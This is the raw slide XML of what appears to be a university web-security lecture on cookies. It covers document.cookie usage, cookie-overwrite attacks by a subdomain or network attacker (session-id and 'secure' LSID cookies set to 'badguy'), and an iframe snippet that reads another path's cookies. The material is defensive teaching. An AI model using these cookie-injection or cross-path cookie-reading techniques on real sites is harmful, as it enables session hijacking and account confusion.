                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=u2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1109"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=u1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=u2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851571" y="6662191"/>
            <a:ext cx="1807723" cy="37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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(arbitrary order)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1052656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22937" y="84332"/>
            <a:ext cx="9389189" cy="1264973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" smtClean="0"/>
              <a:t>Client side read/write:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="35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4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761285" y="1855294"/>
            <a:ext cx="9135428" cy="4891229"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Setting a cookie in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: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solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = “name=value;  expires=…; ”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="665"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reading a cookie:	   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie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</a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="665"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>prints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string containing all cookies available for 	document    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>(based on [protocol], domain, path)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="665"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Deleting a cookie:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="665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7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> =  “name=;  expires= Thu, 01-Jan-70”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2494303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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1691746" y="2023957"/>
            <a:ext cx="6510933" cy="57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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t>:  alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" b="1" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t>)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 cstate="print"/>
          <a:srcRect l="19531" t="37500" r="19531" b="41667"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="896978" y="3035935"/>
            <a:ext cx="8915148" cy="2278709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</p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2625730" y="1150775"/>
            <a:ext cx="1959606" cy="943458"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1760052 w 1765738"/>
              <a:gd name="T1" fmla="*/ 0 h 851338"/>
              <a:gd name="T2" fmla="*/ 565732 w 1765738"/>
              <a:gd name="T3" fmla="*/ 272756 h 851338"/>
              <a:gd name="T4" fmla="*/ 0 w 1765738"/>
              <a:gd name="T5" fmla="*/ 866397 h 851338"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1765738"/>
              <a:gd name="T10" fmla="*/ 0 h 851338"/>
              <a:gd name="T11" fmla="*/ 1765738 w 1765738"/>
              <a:gd name="T12" fmla="*/ 851338 h 8513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5738" h="851338">
                <a:moveTo>
                  <a:pt x="1765738" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1313793" y="63062"/>
                  <a:pt x="861848" y="126124"/>
                  <a:pt x="567558" y="268014"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="273268" y="409904"/>
                  <a:pt x="136634" y="630621"/>
                  <a:pt x="0" y="851338"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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01370" tIns="50685" rIns="101370" bIns="50685"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/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4567714" y="843315"/>
            <a:ext cx="1769251" cy="37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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Javascript URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11270" name="TextBox 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2622206" y="6156202"/>
            <a:ext cx="4411000" cy="37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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Displays all cookies for current document</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1503802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76699" y="337326"/>
            <a:ext cx="9022644" cy="1011978"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" smtClean="0"/>
              <a:t>Viewing/deleting cookies in Browser UI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3857" y="2117073"/>
            <a:ext cx="5757223" cy="488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auto">
          <a:xfrm>
            <a:off x="4652301" y="5142467"/>
            <a:ext cx="2791381" cy="252995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B3EBE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1370" tIns="50685" rIns="101370" bIns="50685"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:latin typeface="+mn-lt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806428" y="5985782"/>
            <a:ext cx="1353397" cy="421658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1370" tIns="50685" rIns="101370" bIns="50685"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="27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2589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Cookie protocol problems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Subtitle 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="930460" y="3663152"/>
            <a:ext cx="8627904" cy="1939625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Server is blind:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Does not see cookie attributes  (e.g. secure)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Does not see which domain set the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/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099635" y="6324866"/>
            <a:ext cx="6009707" cy="517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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>Server only sees:      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cookie:  NAME=VALUE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2252271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 login server problems</a:t>
            </a:r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761286" y="1686631"/>
            <a:ext cx="9389189" cy="5818876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="186550" indent="-367820">
              <a:spcBef>
                <a:spcPts val="2661"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="630045" algn="l"/>
                <a:tab pos="1328727" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Alice logs in at    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>login.site.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="186550" indent="-367820">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="630045" algn="l"/>
                <a:tab pos="1328727" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		login.site.com  sets session-id cookie for  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>site.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="186550" indent="-367820">
              <a:spcBef>
                <a:spcPts val="2661"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="630045" algn="l"/>
                <a:tab pos="1328727" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Alice visits   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil.site.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="186550" indent="-367820">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="630045" algn="l"/>
                <a:tab pos="1328727" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		overwrites    .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    session-id cookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	with session-id of user “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="186550" indent="-367820">
              <a:spcBef>
                <a:spcPts val="2661"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="630045" algn="l"/>
                <a:tab pos="1328727" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Alice visits   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cs142hw.site.com    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to submit homework.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="186550" indent="-367820">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="630045" algn="l"/>
                <a:tab pos="1328727" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		cs142hw.site.com thinks it is talking to “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="186550" indent="-367820">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="630045" algn="l"/>
                <a:tab pos="1328727" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="186550" indent="-367820">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="630045" algn="l"/>
                <a:tab pos="1328727" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem:   cs142hw expects session-id from  login.site.com;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="186550" indent="-367820">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="630045" algn="l"/>
                <a:tab pos="1328727" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			   cannot tell that session-id cookie was overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="186550" indent="-367820">
              <a:tabLst>
                <a:tab pos="630045" algn="l"/>
                <a:tab pos="1328727" algn="l"/>
              </a:tabLs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3137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76698" y="337326"/>
            <a:ext cx="8966253" cy="1011978"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>Example 2:   “secure” cookies are not secure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339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919887" y="1274639"/>
            <a:ext cx="9230588" cy="60349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Alice logs in at    </a:t>
            </a:r>
            <a:r>
              <a:rPr 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https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://www.google.com/accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr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Alice visits     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://www.google.com    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network attacker can inject into response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			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Set-Cookie:  LSID=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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badguy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; secure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	and overwrite secure cookie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Problem:   network attacker can re-write HTTPS cookies !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		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTPS cookie value cannot be trusted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/>
          <a:srcRect l="9258" t="48659" r="32237" b="38725"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="845873" y="1778695"/>
            <a:ext cx="9146001" cy="1474045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</p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15366" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7697444" y="3150135"/>
            <a:ext cx="2453031" cy="307458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="101370" tIns="50685" rIns="101370" bIns="50685"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15367" name="Rounded Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="761286" y="3150135"/>
            <a:ext cx="7274507" cy="520044"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="14902"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="101370" tIns="50685" rIns="101370" bIns="5068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19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Interaction with the DOM SOP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1536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761286" y="1770962"/>
            <a:ext cx="9389189" cy="548155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Cookie SOP:        path separation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	   x.com/A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    does not see cookies of     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x.com/B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Not a security measure:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="191830" indent="-191830">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	DOM SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="666699"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="666699"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x.com/A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="666699"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>has access to DOM of  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="666699"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x.com/B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2217"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=“x.com/B"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1330"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>		a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lert(frames[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
